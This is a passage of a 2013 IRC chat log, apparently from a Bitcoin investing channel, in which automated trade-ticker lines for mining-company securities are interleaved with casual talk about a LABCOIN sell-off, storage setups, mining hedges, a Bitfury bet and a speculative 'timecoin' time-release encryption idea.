[-] Aug 30 19:41:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.02411 = 0.0482 BTC [-] Aug 30 19:41:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.0241 = 0.0482 BTC [-] Aug 30 19:41:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.0241 = 0.2892 BTC [-] Aug 30 19:41:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.02402 = 0.4804 BTC [-] Aug 30 19:41:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.02401 = 0.2161 BTC [-] Aug 30 19:41:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.02401 = 0.1201 BTC [-] Aug 30 19:41:57 [BTCTC] [TAT.ASICMINER] 58 @ 0.02401 = 1.3926 BTC [-] Aug 30 19:45:47 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 30 19:45:49 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [-] Aug 30 19:45:50 [BTCTC] [ASICMINER-PT] 3 @ 2.495 = 7.485 BTC [-] Aug 30 19:46:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02401 = 0.096 BTC [-] Aug 30 19:46:29 [HAVELOCK] [XBOND] 1 @ 0.00111 BTC [-] Aug 30 19:46:49 [BTCTC] [DMS.MINING] 100 @ 0.0033 = 0.33 BTC [-] Aug 30 19:46:51 [BTCTC] [DMS.MINING] 81 @ 0.003382 = 0.2739 BTC [+] Aug 30 19:46:55 [BTCTC] [DMS.MINING] 5 @ 0.003383 = 0.0169 BTC [+] Aug 30 19:47:10 [BTCTC] [DMS.MINING] 144 @ 0.003384 = 0.4873 BTC [+] Aug 30 19:48:48 [HAVELOCK] [AM100] 6 @ 0.0258 = 0.1548 BTC [-] Aug 30 19:52:17 [BTCTC] [BITVPS] 1 @ 0.002749 BTC [-] Aug 30 19:52:50 [HAVELOCK] [HIM] 7 @ 0.175 = 1.225 BTC [-] Aug 30 19:55:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.02401 = 0.096 BTC [-] Aug 30 19:56:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.02402 = 0.0961 BTC [+] Aug 30 19:57:21 [BTCTC] [DMS.PURCHASE] 1263 @ 0.01591 = 20.0943 BTC [-] Aug 30 20:02:13 [BTCTC] [LABCOIN] 20 @ 0.003693 = 0.0739 BTC [-] Aug 30 20:02:14 [BTCTC] [LABCOIN] 544 @ 0.003692 = 2.0084 BTC [-] Aug 30 20:02:15 [BTCTC] [LABCOIN] 601 @ 0.00369 = 2.2177 BTC [-] Aug 30 20:02:17 [BTCTC] [LABCOIN] 2 @ 0.00369 = 0.0074 BTC [-] Aug 30 20:02:17 [BTCTC] [LABCOIN] 415 @ 0.003689 = 1.5309 BTC [-] Aug 30 20:02:18 [BTCTC] [LABCOIN] 100 @ 0.003688 = 0.3688 BTC [-] Aug 30 20:02:19 [BTCTC] [LABCOIN] 4500 @ 0.00368 = 16.56 BTC [-] Aug 30 20:02:20 [BTCTC] [LABCOIN] 100 @ 0.003666 = 0.3666 BTC [-] Aug 30 20:02:21 [BTCTC] [LABCOIN] 24 @ 0.003642 = 0.0874 BTC [-] Aug 30 20:02:22 [BTCTC] [LABCOIN] 99 @ 0.003641 = 0.3605 BTC [-] Aug 30 20:02:23 [BTCTC] [LABCOIN] 137 @ 0.003636 = 0.4981 BTC [-] Aug 30 20:02:24 [BTCTC] [LABCOIN] 450 @ 0.003635 = 1.6358 BTC [-] Aug 30 20:02:25 [BTCTC] [LABCOIN] 100 @ 0.003633 = 0.3633 BTC [-] Aug 30 20:02:25 [BTCTC] [LABCOIN] 29 @ 0.003631 = 0.1053 BTC [-] Aug 30 20:02:26 [BTCTC] [LABCOIN] 117 @ 0.00363 = 0.4247 BTC [-] Aug 30 20:02:27 [BTCTC] [LABCOIN] 270 @ 0.003629 = 0.9798 BTC [-] Aug 30 20:02:29 [BTCTC] [LABCOIN] 80 @ 0.003628 = 0.2902 BTC [-] Aug 30 20:02:30 [BTCTC] [LABCOIN] 1000 @ 0.003627 = 3.627 BTC [-] Aug 30 20:02:31 [BTCTC] [LABCOIN] 24 @ 0.003613 = 0.0867 BTC [-] Aug 30 20:02:32 [BTCTC] [LABCOIN] 99 @ 0.003612 = 0.3576 BTC [-] Aug 30 20:02:33 [BTCTC] [LABCOIN] 5 @ 0.003604 = 0.018 BTC [-] Aug 30 20:02:34 [BTCTC] [LABCOIN] 22 @ 0.003603 = 0.0793 BTC [-] Aug 30 20:02:35 [BTCTC] [LABCOIN] 512 @ 0.003602 = 1.8442 BTC [-] Aug 30 20:02:36 [BTCTC] [LABCOIN] 450 @ 0.003602 = 1.6209 BTC [-] Aug 30 20:02:36 [BTCTC] [LABCOIN] 100 @ 0.003601 = 0.3601 BTC [-] Aug 30 20:02:37 [BTCTC] [LABCOIN] 500 @ 0.003601 = 1.8005 BTC [-] Aug 30 20:02:38 [BTCTC] [LABCOIN] 1448 @ 0.0036 = 5.2128 BTC [-] Aug 30 20:02:39 [BTCTC] [LABCOIN] 75 @ 0.003591 = 0.2693 BTC [-] Aug 30 20:02:40 [BTCTC] [LABCOIN] 200 @ 0.00359 = 0.718 BTC [-] Aug 30 20:02:41 [BTCTC] [LABCOIN] 100 @ 0.003588 = 0.3588 BTC [-] Aug 30 20:02:42 [BTCTC] [LABCOIN] 25 @ 0.003584 = 0.0896 BTC [-] Aug 30 20:02:43 [BTCTC] [LABCOIN] 100 @ 0.003583 = 0.3583 BTC [-] Aug 30 20:02:44 [BTCTC] [LABCOIN] 1275 @ 0.003568 = 4.5492 BTC [-] Aug 30 20:02:45 [BTCTC] [LABCOIN] 3600 @ 0.003567 = 12.8412 BTC [-] Aug 30 20:02:45 [BTCTC] [LABCOIN] 1500 @ 0.003565 = 5.3475 BTC [-] Aug 30 20:02:47 [BTCTC] [LABCOIN] 1615 @ 0.003563 = 5.7542 BTC [-] Aug 30 20:02:48 [BTCTC] [LABCOIN] 4104 @ 0.003562 = 14.6184 BTC [-] Aug 30 20:02:49 [BTCTC] [LABCOIN] 2357 @ 0.003561 = 8.3933 BTC [-] Aug 30 20:02:50 [BTCTC] [LABCOIN] 2755 @ 0.00356 = 9.8078 BTC [-] Aug 30 20:02:51 [BTCTC] [LABCOIN] 20 @ 0.003559 = 0.0712 BTC [-] Aug 30 20:02:52 [BTCTC] [LABCOIN] 4572 @ 0.003557 = 16.2626 BTC [-] Aug 30 20:02:54 [BTCTC] [ASICMINER-PT] 1 @ 2.495 BTC [-] Aug 30 20:02:58 big labcoin poop Aug 30 20:03:18 it's good to poop at least once a day Aug 30 20:03:56 lol Aug 30 20:05:28 [BTCTC] [ASICMINER-PT] 5 @ 2.529 = 12.645 BTC [+] Aug 30 20:05:29 [BTCTC] [ASICMINER-PT] 5 @ 2.53 = 12.65 BTC [+] Aug 30 20:06:18 [BTCTC] [DMS.SELLING] 1 @ 0.0126 BTC [-] Aug 30 20:09:12 [BTCTC] [ACTIVEMINING] 22 @ 0.0047 = 0.1034 BTC [-] Aug 30 20:10:36 actm is really living up to ken slaughter's prowess Aug 30 20:13:49 seeems it barely moves anymore Aug 30 20:13:52 like Ken? Aug 30 20:14:52 (07:41) < thestringpuller> where is mod6 << hey! :P Aug 30 20:15:14 [BTCTC] [BTC-GROWTH] 4 @ 0.0981 = 0.3924 BTC [-] Aug 30 20:15:36 jre raid controller? wtf Aug 30 20:15:58 it's teh latest tech Aug 30 20:16:28 only available for professional experts Aug 30 20:17:35 lol Aug 30 20:17:38 [BTCTC] [BTC-GROWTH] 16 @ 0.0981 = 1.5696 BTC [-] Aug 30 20:17:54 mod6: i wanted you around for the discussion about jre being used for raid arrays Aug 30 20:18:25 [BTCTC] [LABCOIN] 25 @ 0.0001 = 0.0025 BTC [-] Aug 30 20:19:26 well, yeah software raid isn't very awesome Aug 30 20:19:34 i like hardware raid Aug 30 20:19:37 [HAVELOCK] [XBOND] 7 @ 0.0011 = 0.0077 BTC [-] Aug 30 20:19:59 but, w/e Aug 30 20:20:38 [BTCTC] [LABCOIN] 53 @ 0.003696 = 0.1959 BTC [+] Aug 30 20:20:40 [HAVELOCK] [AM100] 2 @ 0.0258 = 0.0516 BTC [-] Aug 30 20:20:45 ;;nethash\ Aug 30 20:20:45 Error: "nethash\" is not a valid command. Aug 30 20:20:49 ;;nethash Aug 30 20:20:50 643696.855862 Aug 30 20:20:54 ;;estimate Aug 30 20:20:55 Next difficulty estimate | 79561611.338 based on data since last change | 89922039.8386 based on data for last three days Aug 30 20:20:59 looks like the site is back up tho. so \o/ Aug 30 20:21:21 fractal can you link me to that mining calc again? Aug 30 20:21:27 [HAVELOCK] [XBOND] 17 @ 0.0011 = 0.0187 BTC [-] Aug 30 20:21:29 i lost my tabs Aug 30 20:22:23 mod6 ;/ Aug 30 20:22:28 [BTCTC] [LABCOIN] 255 @ 0.003696 = 0.9425 BTC [+] Aug 30 20:23:07 [BTCTC] [LABCOIN] 25 @ 0.003696 = 0.0924 BTC [+] Aug 30 20:23:10 [BTCTC] [LABCOIN] 235 @ 0.003697 = 0.8688 BTC [+] Aug 30 20:23:33 [BTCTC] [LABCOIN] 198 @ 0.003696 = 0.7318 BTC [-] Aug 30 20:23:41 [BTCTC] [LABCOIN] 235 @ 0.003697 = 0.8688 BTC [+] Aug 30 20:23:41 [BTCTC] [LABCOIN] 20 @ 0.003698 = 0.074 BTC [+] Aug 30 20:23:42 [BTCTC] [LABCOIN] 971 @ 0.003699 = 3.5917 BTC [+] Aug 30 20:23:43 [BTCTC] [LABCOIN] 736 @ 0.0037 = 2.7232 BTC [+] Aug 30 20:24:27 mircea_popescu: was hell getting it back up 'eh Aug 30 20:25:15 http://btcinvest.net/bitcoin-mining-profit-calculator.php Aug 30 20:25:16 myeah Aug 30 20:25:22 thx Aug 30 20:25:23 CTRL+SHIFT+T will undo closed tabs ThickAsThieves Aug 30 20:25:41 it's one of those things where this guy who is clueless in your field (me) has very strongly held beliefs you disregard because you're the sysadmin Aug 30 20:26:00 deadweasel it was a larger issue Aug 30 20:26:05 only to have to like, build shit oout of mud and hay to fix things up under his smh gazer Aug 30 20:26:32 i imagine the poor guy is scarred for life Aug 30 20:26:38 yeah, saw that :/ Aug 30 20:27:03 well, live and learn. i bet he'll never use something like that again Aug 30 20:27:29 possibly not Aug 30 20:28:44 jurov your futures are too expensive! Aug 30 20:28:47 i typically like to use redundant storage systems for mission critical stuff -- if the budget permits it. which funny enough, lots of places thing they're "good" with just one SAN. Aug 30 20:29:30 SAN = Security Agent National Aug 30 20:29:39 ThickAsThieves didn;'t he get burned last month ? Aug 30 20:29:47 gecko_x2 stiorage network Aug 30 20:29:50 yes, to my benefit Aug 30 20:29:58 i know i know.. Aug 30 20:29:59 lol so give him a break Aug 30 20:30:06 i bought all of em pretty much Aug 30 20:30:16 indeed, Aug 30 20:30:19 [BTCTC] [LABCOIN] 1 @ 0.00369 BTC [-] Aug 30 20:30:21 [BTCTC] [LABCOIN] 1 @ 0.00368 BTC [-] Aug 30 20:30:22 [BTCTC] [LABCOIN] 1 @ 0.00367 BTC [-] Aug 30 20:30:23 [BTCTC] [LABCOIN] 1 @ 0.00366 BTC [-] Aug 30 20:30:24 [BTCTC] [LABCOIN] 1 @ 0.00365 BTC [-] Aug 30 20:30:26 [BTCTC] [LABCOIN] 1 @ 0.00364 BTC [-] Aug 30 20:30:27 but they also dont work for mining hedge either Aug 30 20:30:27 [BTCTC] [LABCOIN] 1 @ 0.00363 BTC [-] Aug 30 20:30:28 [BTCTC] [LABCOIN] 1 @ 0.00362 BTC [-] Aug 30 20:30:29 [BTCTC] [LABCOIN] 1 @ 0.00361 BTC [-] Aug 30 20:30:29 [BTCTC] [LABCOIN] 475 @ 0.003602 = 1.711 BTC [-] Aug 30 20:30:30 [BTCTC] [LABCOIN] 1200 @ 0.0036 = 4.32 BTC [-] Aug 30 20:30:31 [BTCTC] [LABCOIN] 18 @ 0.003581 = 0.0645 BTC [-] Aug 30 20:30:32 [BTCTC] [LABCOIN] 75 @ 0.00358 = 0.2685 BTC [-] Aug 30 20:30:33 [BTCTC] [LABCOIN] 1607 @ 0.003558 = 5.7177 BTC [-] Aug 30 20:30:34 [BTCTC] [LABCOIN] 6428 @ 0.003557 = 22.8644 BTC [-] Aug 30 20:30:44 not that jurov is the steward of mining hedges Aug 30 20:30:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Aug 30 20:31:16 nothing works for hedging fucking exponentials. Aug 30 20:31:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Aug 30 20:31:42 i tried designing a new type of mining future that was shorter terms, more dynamic Aug 30 20:31:50 but kept hitting walls Aug 30 20:32:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.02499 = 0.9996 BTC [-] Aug 30 20:32:12 havent given up tho Aug 30 20:32:17 [BTCTC] [DMS.MINING] 5 @ 0.003297 = 0.0165 BTC [-] Aug 30 20:32:47 this excercise is partly what led me to realizing the value of current bonds Aug 30 20:32:48 the blockchain allows for a new technology that might be revolutionary for a society Aug 30 20:33:02 namely time-release encryption Aug 30 20:33:03 yeah well, i have kinda given up. once it comes out of insanity we can financialize it Aug 30 20:33:05 for now... Aug 30 20:33:07 17:10 where do I type that in Aug 30 20:33:15 i propose the creation of timecoins Aug 30 20:33:20 oops Aug 30 20:33:23 lol Aug 30 20:33:39 which you could buy and use for locking information until a specific time in the future Aug 30 20:34:08 can i premine it? Aug 30 20:34:24 back to the future! Aug 30 20:34:29 mircea_popescu: did that work? Aug 30 20:34:56 the mechanism for preventing early leaks of the encryption key would be based on millions of parts of the master key encoded in the data field of these timecoins Aug 30 20:35:35 the decryption of the hidden data would need something like 75% of the specific coins Aug 30 20:36:15 [BTCTC] [DMS.SELLING] 85 @ 0.0128 = 1.088 BTC [+] Aug 30 20:36:15 [BTCTC] [DMS.SELLING] 422 @ 0.01285 = 5.4227 BTC [+] Aug 30 20:36:16 [BTCTC] [DMS.SELLING] 4 @ 0.01286 = 0.0514 BTC [+] Aug 30 20:36:18 [BTCTC] [DMS.SELLING] 200 @ 0.01286 = 2.572 BTC [+] Aug 30 20:36:19 [BTCTC] [DMS.SELLING] 139 @ 0.01297 = 1.8028 BTC [+] Aug 30 20:36:22 gecko_x2 why can't someone just look at their datafield on the network ? Aug 30 20:36:23 holders of the coins, or 75% of them distributed globally all with personal incentives, would refrain from releasing the coins too early because they would loose all value Aug 30 20:36:42 in addition Aug 30 20:37:15 holders of the coins will all be the first to get to see the hidden message, provided the message is intended for public view Aug 30 20:37:25 [BTCTC] [LABCOIN] 420 @ 0.003553 = 1.4923 BTC [-] Aug 30 20:37:45 that aspects would give coins their value and some fierce speculation would ensue too :) Aug 30 20:37:50 for ex Aug 30 20:38:08 let's set the system to support for ex 500 years into the future Aug 30 20:38:33 then create secondcoins, minutecoins, hourcoins Aug 30 20:38:46 each with it's own blockchain Aug 30 20:39:06 [BTCTC] [DMS.SELLING] 30 @ 0.01297 = 0.3891 BTC [+] Aug 30 20:39:18 and limited, so for ex there can exist only so many second coins as there are seconds in 500 years Aug 30 20:39:25 same with minute, hour Aug 30 20:39:56 so now say for ex i want to hide a secret message for the world, to be revealed after 5 years Aug 30 20:40:27 so i purchase the amount of h, m and s coins so it adds up to 5 years Aug 30 20:40:32 [BTCTC] [DMS.PURCHASE] 2 @ 0.01591 = 0.0318 BTC [-] Aug 30 20:40:58 those coins are used to create a master key, derived from the hashes of those specific coins Aug 30 20:41:10 now the coins are released for trading globally Aug 30 20:41:16 anyone can buy them Aug 30 20:41:47 the open source software they use, like bitcoin wallet, can be set to automatically release the coins after 5 years Aug 30 20:41:54 creating the master key Aug 30 20:41:59 and revealing the secret. Aug 30 20:42:04 [MPEX] [S.MPOE] 7950 @ 0.00086581 = 6.8832 BTC [-] Aug 30 20:42:11 [BTCTC] [LABCOIN] 39 @ 0.003554 = 0.1386 BTC [+] Aug 30 20:42:13 [BTCTC] [LABCOIN] 51 @ 0.003553 = 0.1812 BTC [-] Aug 30 20:42:14 [BTCTC] [LABCOIN] 6 @ 0.003552 = 0.0213 BTC [-] Aug 30 20:42:15 [BTCTC] [LABCOIN] 100 @ 0.003551 = 0.3551 BTC [-] Aug 30 20:42:16 [BTCTC] [LABCOIN] 24 @ 0.003526 = 0.0846 BTC [-] Aug 30 20:42:17 [BTCTC] [LABCOIN] 98 @ 0.003525 = 0.3455 BTC [-] Aug 30 20:42:18 [BTCTC] [LABCOIN] 15 @ 0.003521 = 0.0528 BTC [-] Aug 30 20:42:19 [BTCTC] [LABCOIN] 45 @ 0.00352 = 0.1584 BTC [-] Aug 30 20:42:25 anyway, something like that is what i've been thinking off Aug 30 20:42:47 ofcourse the blockchain itself would prevent any tampering of the data during the 5 years Aug 30 20:42:49 seeems it barely moves anymore Aug 30 20:42:49 like Ken? +1 Aug 30 20:42:58 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [+] Aug 30 20:43:11 [BTCTC] [LABCOIN] 11 @ 0.003661 = 0.0403 BTC [+] Aug 30 20:44:03 [BTCTC] [BASIC-MINING] 1 @ 0.1919 BTC [+] Aug 30 20:44:53 [BTCTC] [BASIC-MINING] 1 @ 0.192 BTC [+] Aug 30 20:51:44 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [+] Aug 30 20:53:24 [BTCTC] [DMS.MINING] 228 @ 0.003297 = 0.7517 BTC [-] Aug 30 20:54:30 [BTCTC] [DMS.MINING] 280 @ 0.003299 = 0.9237 BTC [+] Aug 30 20:57:03 [BTCTC] [ACTIVEMINING] 2 @ 0.004681 = 0.0094 BTC [-] Aug 30 21:01:56 mircea_popescu: anything new about the bitfury bet? Aug 30 21:02:06 i think there are now 5 confirmed deliveries Aug 30 21:02:12 but it still lacks a delivery of 400gh kit Aug 30 21:02:35 but after all, both kits are built from same modular cards Aug 30 21:02:53 Rulother is the designated news agent for the bet Aug 30 21:03:00 poor guy. Aug 30 21:03:07 i'm sorry r, it's just too funny! Aug 30 21:03:26 k forget i ever described that just now Aug 30 21:03:30 does Rulother know something i do not? Aug 30 21:03:45 Anduck he just made the mistake of saying he's sick of all the bet discussion already. Aug 30 21:03:48 btw mircea_popescu why have the "pending resolution" in the footer bar changed from "1/9" to "0/9" Aug 30 21:03:49 but otherwise no, no news so far. Aug 30 21:03:50 don't want to be responsible for a global thermonuclear war and destroying mankind.. Aug 30 21:04:30 [BTCTC] [ACTIVEMINING] 50 @ 0.004582 = 0.2291 BTC [-] Aug 30 21:04:31 [BTCTC] [ACTIVEMINING] 10 @ 0.004581 = 0.0458 BTC [-] Aug 30 21:04:32 [BTCTC] [ACTIVEMINING] 3 @ 0.00458 = 0.0137 BTC [-] Aug 30 21:04:33 [BTCTC] [ACTIVEMINING] 10 @ 0.004551 = 0.0455 BTC [-] Aug 30 21:04:34 [BTCTC] [ACTIVEMINING] 193 @ 0.004414 = 0.8519 BTC [-] Aug 30 21:04:49 uh i dunno ? leseee Aug 30 21:05:48 no idea why it does that, buit the bet itself is still "Betting closed. Pending resolution." and "Resolution: Aug 30 21:05:48 in 1 day 5 hours (01-09-2013)" Aug 30 21:06:05 i know why it does that Aug 30 21:06:16 hmm Aug 30 21:06:28 why? Aug 30 21:07:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.02497 = 0.3496 BTC [-] Aug 30 21:07:35 [BTCTC] [TAT.ASICMINER] 50 @ 0.02497 = 1.2485 BTC [-] Aug 30 21:07:46 9 bets are waiting resolution but 0 of them are ripe for it Aug 30 21:08:07 ah Aug 30 21:08:36 what?? Aug 30 21:08:43 isn't that bitfury bet ready for resolution? Aug 30 21:09:11 not until the 1st. Aug 30 21:09:15 Resolution: Aug 30 21:09:16 in 1 day 5 hours (01-09-2013) Aug 30 21:09:26 but ain't the 5 deliveries already confirmed Aug 30 21:09:27 ? Aug 30 21:09:39 or does it actually require a 400gh unit? Aug 30 21:09:55 i guess we will know in 1 day and 5 hrs Aug 30 21:10:01 once a bet closes of due time it doesn't resolve until the resolution date. Aug 30 21:10:11 [BTCTC] [DMS.MINING] 32 @ 0.003299 = 0.1056 BTC [+] Aug 30 21:10:56 [BTCTC] [LABCOIN] 20 @ 0.003576 = 0.0715 BTC [-] Aug 30 21:12:56 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [+] Aug 30 21:14:38 [BTCTC] [TAT.ASICMINER] 46 @ 0.0242 = 1.1132 BTC [-] Aug 30 21:14:50 [BTCTC] [DMS.MINING] 24 @ 0.003299 = 0.0792 BTC [+] Aug 30 21:16:39 [BTCTC] [LABCOIN] 20 @ 0.003576 = 0.0715 BTC [-] Aug 30 21:17:17 [BTCTC] [LABCOIN] 2 @ 0.003575 = 0.0072 BTC [-] Aug 30 21:18:50 [BTCTC] [LABCOIN] 15 @ 0.00352 = 0.0528 BTC [-] Aug 30 21:18:50 [BTCTC] [LABCOIN] 407 @ 0.003519 = 1.4322 BTC [-] Aug 30 21:18:52 [BTCTC] [LABCOIN] 850 @ 0.003516 = 2.9886 BTC [-] Aug 30 21:18:53 [BTCTC] [LABCOIN] 336 @ 0.003515 = 1.181 BTC [-] Aug 30 21:20:45 [BTCTC] [LABCOIN] 1 @ 0.00352 BTC [+] Aug 30 21:20:55 http://agonistica.com/wp-content/uploads/2012/12/Sophie.jpeg << what's this ? Aug 30 21:21:46 milk Aug 30 21:22:03 lol Aug 30 21:22:15 [BTCTC] [LABCOIN] 5 @ 0.003519 = 0.0176 BTC [-] Aug 30 21:22:25 [BTCTC] [LABCOIN] 10 @ 0.003517 = 0.0352 BTC [-] Aug 30 21:22:38 [BTCTC] [LABCOIN] 10 @ 0.003517 = 0.0352 BTC [-] Aug 30 21:23:47 [BTCTC] [LABCOIN] 4930 @ 0.003512 = 17.3142 BTC [-] Aug 30 21:23:48 [BTCTC] [LABCOIN] 5100 @ 0.00351 = 17.901 BTC [-] Aug 30 21:23:50 [BTCTC] [LABCOIN] 200 @ 0.003502 = 0.7004 BTC [-] Aug 30 21:23:51 [BTCTC] [LABCOIN] 10 @ 0.0035 = 0.035 BTC [-] Aug 30 21:23:52 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [-] Aug 30 21:23:52 [BTCTC] [LABCOIN] 200 @ 0.0035 = 0.7 BTC [-] Aug 30 21:23:53 [BTCTC] [LABCOIN] 5000 @ 0.0035 = 17.5 BTC [-] Aug 30 21:23:55 [BTCTC] [LABCOIN] 1428 @ 0.0035 = 4.998 BTC [-] Aug 30 21:23:56 yeah sell that crap Aug 30 21:24:01 sell it to hell Aug 30 21:24:12 :) Aug 30 21:24:41 [BTCTC] [BASIC-MINING] 1 @ 0.1949 BTC [+] Aug 30 21:24:44 [BTCTC] [LABCOIN] 470 @ 0.003499 = 1.6445 BTC [-] Aug 30 21:24:45 [BTCTC] [LABCOIN] 470 @ 0.0035 = 1.645 BTC [+] Aug 30 21:24:52 [BTCTC] [LABCOIN] 5 @ 0.0035 = 0.0175 BTC [+] Aug 30 21:24:55 [BTCTC] [LABCOIN] 100 @ 0.00349 = 0.349 BTC [-] Aug 30 21:24:57 [BTCTC] [LABCOIN] 460 @ 0.003488 = 1.6045 BTC [-] Aug 30 21:24:58 [BTCTC] [LABCOIN] 100 @ 0.003488 = 0.3488 BTC [-] Aug 30 21:24:58 [BTCTC] [LABCOIN] 200 @ 0.003485 = 0.697 BTC [-] Aug 30 21:24:59 [BTCTC] [LABCOIN] 500 @ 0.003456 = 1.728 BTC [-] Aug 30 21:25:01 [BTCTC] [LABCOIN] 100 @ 0.003451 = 0.3451 BTC [-] Aug 30 21:25:02 [BTCTC] [LABCOIN] 359 @ 0.003409 = 1.2238 BTC [-] Aug 30 21:25:03 [BTCTC] [LABCOIN] 100 @ 0.003405 = 0.3405 BTC [-] Aug 30 21:25:04 [BTCTC] [LABCOIN] 578 @ 0.003405 = 1.9681 BTC [-] Aug 30 21:25:07 lab coin sounds like some hospital device which is extremely unpleasant Aug 30 21:25:23 hah Aug 30 21:25:25 [BTCTC] [BASIC-MINING] 1 @ 0.195 BTC [+] Aug 30 21:25:40 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [-] Aug 30 21:25:41 [BTCTC] [LABCOIN] 24 @ 0.003396 = 0.0815 BTC [-] Aug 30 21:25:43 [BTCTC] [LABCOIN] 359 @ 0.003393 = 1.2181 BTC [-] Aug 30 21:25:44 [BTCTC] [LABCOIN] 25 @ 0.003391 = 0.0848 BTC [-] Aug 30 21:25:44 [BTCTC] [LABCOIN] 100 @ 0.00339 = 0.339 BTC [-] Aug 30 21:25:45 [BTCTC] [LABCOIN] 249 @ 0.003371 = 0.8394 BTC [-] Aug 30 21:25:46 It's some guy trying to off 30k shares Aug 30 21:25:46 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 21:25:47 [BTCTC] [LABCOIN] 900 @ 0.00337 = 3.033 BTC [-] Aug 30 21:25:48 [BTCTC] [LABCOIN] 98 @ 0.003368 = 0.3301 BTC [-] Aug 30 21:25:49 [BTCTC] [LABCOIN] 1113 @ 0.003363 = 3.743 BTC [-] Aug 30 21:25:50 [BTCTC] [LABCOIN] 4452 @ 0.003362 = 14.9676 BTC [-] Aug 30 21:25:51 [BTCTC] [LABCOIN] 50 @ 0.003359 = 0.168 BTC [-] Aug 30 21:25:53 [BTCTC] [LABCOIN] 100 @ 0.003358 = 0.3358 BTC [-] Aug 30 21:25:54 [BTCTC] [LABCOIN] 100 @ 0.003357 = 0.3357 BTC [-] Aug 30 21:25:54 [BTCTC] [LABCOIN] 2025 @ 0.003351 = 6.7858 BTC [-] Aug 30 21:25:55 [BTCTC] [LABCOIN] 8100 @ 0.00335 = 27.135 BTC [-] Aug 30 21:25:56 [BTCTC] [LABCOIN] 24 @ 0.003342 = 0.0802 BTC [-] Aug 30 21:25:57 [BTCTC] [LABCOIN] 96 @ 0.003341 = 0.3207 BTC [-] Aug 30 21:25:58 [BTCTC] [LABCOIN] 1362 @ 0.003336 = 4.5436 BTC [-] Aug 30 21:25:59 [BTCTC] [LABCOIN] 5250 @ 0.003335 = 17.5088 BTC [-] Aug 30 21:26:00 [BTCTC] [LABCOIN] 100 @ 0.003334 = 0.3334 BTC [-] Aug 30 21:26:01 [BTCTC] [LABCOIN] 100 @ 0.003333 = 0.3333 BTC [-] Aug 30 21:26:02 [BTCTC] [LABCOIN] 24 @ 0.003315 = 0.0796 BTC [-] Aug 30 21:26:02 i'm a buyer at 0014 Aug 30 21:26:03 [BTCTC] [LABCOIN] 97 @ 0.003314 = 0.3215 BTC [-] Aug 30 21:26:03 [BTCTC] [LABCOIN] 1 @ 0.003311 BTC [-] Aug 30 21:26:04 [BTCTC] [LABCOIN] 5 @ 0.00331 = 0.0166 BTC [-] Aug 30 21:26:05 [BTCTC] [LABCOIN] 85 @ 0.003301 = 0.2806 BTC [-] Aug 30 21:26:06 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [-] Aug 30 21:26:07 [BTCTC] [LABCOIN] 250 @ 0.0033 = 0.825 BTC [-] Aug 30 21:26:08 [BTCTC] [LABCOIN] 90 @ 0.0033 = 0.297 BTC [-] Aug 30 21:26:09 [BTCTC] [LABCOIN] 99 @ 0.0033 = 0.3267 BTC [-] Aug 30 21:26:10 [BTCTC] [LABCOIN] 100 @ 0.0033 = 0.33 BTC [-] Aug 30 21:26:12 [BTCTC] [LABCOIN] 318 @ 0.0033 = 1.0494 BTC [-] Aug 30 21:26:17 [BTCTC] [LABCOIN] 318 @ 0.0033 = 1.0494 BTC [-] Aug 30 21:26:28 [BTCTC] [LABCOIN] 600 @ 0.003299 = 1.9794 BTC [-] Aug 30 21:26:45 [BTCTC] [LABCOIN] 120 @ 0.003299 = 0.3959 BTC [-] Aug 30 21:26:45 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Aug 30 21:27:09 30k shares?.. i imagined ppl traded in batches of those Aug 30 21:27:09 [BTCTC] [LABCOIN] 150 @ 0.003299 = 0.4949 BTC [-] Aug 30 21:27:23 [BTCTC] [LABCOIN] 1700 @ 0.003299 = 5.6083 BTC [-] Aug 30 21:27:24 [BTCTC] [ASICMINER-PT] 1 @ 2.497 BTC [-] Aug 30 21:27:31 [BTCTC] [LABCOIN] 7339 @ 0.003299 = 24.2114 BTC [-] Aug 30 21:27:51 [BTCTC] [LABCOIN] 5 @ 0.003394 = 0.017 BTC [+] Aug 30 21:28:35 i was a buyer at 0022 Aug 30 21:28:36 labiacoin? Aug 30 21:28:39 missed 0018 Aug 30 21:28:46 [BTCTC] [LABCOIN] 588 @ 0.003391 = 1.9939 BTC [-] Aug 30 21:28:48 [BTCTC] [LABCOIN] 12 @ 0.003393 = 0.0407 BTC [+] Aug 30 21:28:59 yeah deadweasel Aug 30 21:29:05 something like that :p Aug 30 21:29:09 hehehe Aug 30 21:29:24 i think that's the word i was looking for Aug 30 21:29:29 clitcoin Aug 30 21:29:30 [MPEX] [S.MPOE] 7050 @ 0.00087257 = 6.1516 BTC [+] Aug 30 21:29:46 [BTCTC] [LABCOIN] 288 @ 0.003391 = 0.9766 BTC [-] Aug 30 21:29:47 [MPEX] [S.MPOE] 912 @ 0.00087353 = 0.7967 BTC [+] Aug 30 21:29:56 cept maybe PR. Aug 30 21:30:11 now the next ipo that will have 'coin', 'active', 'virtual' or 'crypto' in it's name i will NOT buy Aug 30 21:30:12 [BTCTC] [LABCOIN] 135 @ 0.00339 = 0.4577 BTC [-] Aug 30 21:30:21 i don't care if it's a 10 bagger Aug 30 21:30:38 i will not be subjected to names that make me sound like a fucking ape Aug 30 21:30:42 coinactive mining Aug 30 21:30:44 [BTCTC] [LABCOIN] 147 @ 0.00339 = 